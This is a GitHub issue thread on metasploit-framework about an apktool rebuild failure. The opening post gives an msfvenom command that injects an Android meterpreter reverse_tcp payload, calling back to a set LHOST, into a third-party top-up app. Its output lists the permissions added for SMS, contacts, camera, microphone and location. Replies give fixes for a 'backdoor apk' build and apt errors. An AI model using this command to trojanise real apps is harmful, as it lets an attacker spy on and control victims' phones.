### ISSUE TITLE
Error : Unable to rebuild apk  with apktool

### ISSUE THREAD

**Issue by theamanrawat** [rapid7/metasploit-framework#11098]
root@kali:~# msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.96 LPORT=8080 -x '/root/Desktop/top.apk' -o infected_test.apk
Using APK template: /root/Desktop/top.apk
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.example.hp.topupmoney.qdvyt
[*] Loading /tmp/d20181210-8355-9qttbm/original/smali/com/example/hp/topupmoney/MainActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.INTERNET"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Rebuilding /root/Desktop/top.apk with meterpreter injection as /tmp/d20181210-8355-9qttbm/output.apk
Error: Unable to rebuild apk with apktool

**Comment by hiddenwishes** [comment]
#solution for backdoor apk(compile decompile error)

apt-get install zipalign
apt-get update
apt-get upgrade
apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6

sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev

apt-get full-upgrade

apktool empty-framework-dir


#@dsx12 There is not. If you find one - let me know. Maybe they can take some of my open bugs. #This issue you have reported and it seems spread to various bug trackers is a combination of issues.

  #  You need latest Apktool to have the latest AOSP framework file. Otherwise you are forced to pass the updated framework to Apktool. It seems you are up to date. So if you upgraded to a newer Apktool, you might have an old cached previous framework file. That is where apktool empty-framework-dir comes into play. It removes those, so the newer version of Apktool running can write a new framework file.
#
 ##  This error reporting has two issues that have been fixed for months. These issues however need to be fixed with aapt2, not aapt1. As of now, you need to opt into aapt2 with the --use-aapt2 flag during build. Applications originally built with aapt2 have issues building with the older aapt1. Attempts have been made to identify what version of aapt` built an application, but that ticket has been on the back-burner.

#So after point 2, there is no bug in metasploit, but perhaps a feature request for msfvenom to use that parameter (--use-aapt2) on an optional basis.

#The other issues reported on Debian/Kali just don't make sense. People seem to be making up "missing jars" and what not. None of those stacktraces have anything to do with missing jar files. They are #about more restrictive applications when building, which loops back to outdated frameworks and aapt1 vs aapt2.

#Finally, in this bug report - https://bugs.kali.org/view.php?id=5126. The user has this warning line.

#W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)

**Comment by jonasyumi** [comment]
> #solution for backdoor apk(compile decompile error)
> 
> apt-get install zipalign
> apt-get update
> apt-get upgrade
> apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6
> 
> sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev
> 
> apt-get full-upgrade
> 
> apktool empty-framework-dir
> 
> #@dsx12 There is not. If you find one - let me know. Maybe they can take some of my open bugs. #This issue you have reported and it seems spread to various bug trackers is a combination of issues.
> 
> # You need latest Apktool to have the latest AOSP framework file. Otherwise you are forced to pass the updated framework to Apktool. It seems you are up to date. So if you upgraded to a newer Apktool, you might have an old cached previous framework file. That is where apktool empty-framework-dir comes into play. It removes those, so the newer version of Apktool running can write a new framework file.
> ## This error reporting has two issues that have been fixed for months. These issues however need to be fixed with aapt2, not aapt1. As of now, you need to opt into aapt2 with the --use-aapt2 flag during build. Applications originally built with aapt2 have issues building with the older aapt1. Attempts have been made to identify what version of aapt` built an application, but that ticket has been on the back-burner.
> #So after point 2, there is no bug in metasploit, but perhaps a feature request for msfvenom to use that parameter (--use-aapt2) on an optional basis.
> 
> #The other issues reported on Debian/Kali just don't make sense. People seem to be making up "missing jars" and what not. None of those stacktraces have anything to do with missing jar files. They are #about more restrictive applications when building, which loops back to outdated frameworks and aapt1 vs aapt2.
> 
> #Finally, in this bug report - https://bugs.kali.org/view.php?id=5126. The user has this warning line.
> 
> #W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)

sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package lib32stdc++6
E: Couldn't find any package by regex 'lib32stdc++6'
E: Unable to locate package lib32z1
E: Unable to locate package lib32z1-dev
